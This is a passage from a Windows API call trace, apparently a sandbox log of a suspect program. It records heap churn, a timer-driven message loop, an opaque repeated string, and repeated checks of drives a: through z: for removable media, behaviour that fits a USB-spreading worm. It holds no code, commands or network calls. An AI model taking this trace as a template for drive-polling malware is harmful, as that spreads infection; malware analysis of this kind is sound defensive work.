lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0219.903] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0219.903] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0219.903] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0219.903] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0219.903] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0219.903] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0219.903] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7d0 [0219.903] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318cc0 [0219.903] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0219.903] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318cc0 | out: hHeap=0x12c0000) returned 1 [0219.903] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0219.903] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd358 [0219.903] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318de0 [0219.904] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.904] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef830 [0219.904] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0219.904] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0219.904] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef850 [0219.904] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0219.904] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0219.904] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0219.904] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0219.904] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0219.904] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef870 [0219.904] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febf0 [0219.904] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0219.904] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0219.904] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0219.905] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0219.905] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0219.905] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0219.905] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0219.905] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0219.905] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0219.906] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0219.906] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0219.906] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0219.907] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0219.907] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0219.907] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0219.907] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0219.907] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0219.907] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0219.908] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0219.908] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0219.908] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0219.908] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0219.908] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0219.909] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0219.909] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0219.909] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0219.909] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0219.909] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febf0 | out: hHeap=0x12c0000) returned 1 [0219.909] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0219.909] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0219.909] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0219.909] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0219.909] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0219.909] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0219.910] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0219.910] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7b0 [0219.910] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0219.910] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0219.910] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0219.910] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0219.910] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0219.958] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0219.958] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0219.958] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0219.959] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.959] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0219.959] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0219.959] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0219.959] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326160 [0219.959] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0219.959] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0219.959] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0219.959] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0219.959] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326160 | out: hHeap=0x12c0000) returned 1 [0219.959] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0219.959] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0219.959] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e440 [0219.959] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.959] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e440 | out: hHeap=0x12c0000) returned 1 [0219.959] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.959] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318de0 | out: hHeap=0x12c0000) returned 1 [0219.959] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0219.960] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0219.960] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0219.960] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0219.960] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0219.960] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0219.960] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0219.960] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0219.960] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0219.960] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0219.960] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0219.960] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0219.960] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0219.960] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0219.960] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0219.960] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0219.960] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0219.960] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd208 [0219.960] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0219.960] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.961] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7d0 [0219.961] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0219.961] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0219.961] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0219.961] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0219.961] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0219.961] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0219.961] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0219.961] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8a0 [0219.961] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7e0 [0219.961] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0219.961] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0219.961] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0219.961] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0219.962] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0219.962] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0219.962] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0219.962] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0219.962] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0219.962] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0219.962] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0219.963] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0219.963] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0219.963] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0219.963] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0219.963] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0219.964] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0219.964] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0219.964] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0219.964] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0219.964] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0219.964] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0219.965] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0219.965] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0219.965] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0219.965] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0219.965] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0219.965] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0219.966] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0219.966] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7e0 | out: hHeap=0x12c0000) returned 1 [0219.966] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0219.966] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0219.966] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0219.966] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0219.966] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0219.966] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0219.966] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef870 [0219.966] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0219.966] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0219.966] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0219.966] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.966] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0219.966] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0219.966] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7d0 [0219.966] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326160 [0219.966] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0219.966] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0219.966] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0219.967] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0219.967] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326160 | out: hHeap=0x12c0000) returned 1 [0219.967] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0219.967] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0219.967] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e340 [0219.967] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.967] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e340 | out: hHeap=0x12c0000) returned 1 [0219.967] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.967] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0219.967] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0219.967] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0219.967] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0219.967] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0219.967] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0219.967] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0219.967] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0219.967] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0219.967] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0219.967] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0219.967] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0219.967] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0219.967] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7d0 [0219.967] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318c78 [0219.967] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0219.968] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318c78 | out: hHeap=0x12c0000) returned 1 [0219.968] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0219.968] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd208 [0219.968] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318c78 [0219.968] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.968] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0219.968] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0219.968] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0219.968] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0219.968] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0219.968] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0219.968] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0219.968] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0219.968] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef810 [0219.968] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7d0 [0219.968] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0219.968] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0219.968] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0219.969] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0219.969] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0219.969] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0219.970] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0219.970] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0219.971] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0219.971] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0219.971] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0219.971] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0219.971] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0219.972] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0219.972] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0219.972] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0219.972] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0219.972] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0219.973] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0219.973] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0219.973] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0219.973] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0219.973] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0219.974] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0219.974] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0219.974] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0219.974] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0219.974] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0219.975] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0219.975] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0219.975] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0219.975] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0219.975] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0219.975] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0219.975] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fec40 [0219.975] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0219.975] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0219.975] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0219.975] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0219.975] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0219.975] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0219.975] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0219.975] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0219.975] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0219.975] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0219.976] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.976] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0219.976] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0219.976] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0219.976] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326160 [0219.976] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0219.976] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0219.976] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0219.976] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0219.976] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326160 | out: hHeap=0x12c0000) returned 1 [0219.976] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0219.976] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0219.976] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e5c0 [0219.976] PeekMessageW (in: lpMsg=0x7dfb8c, 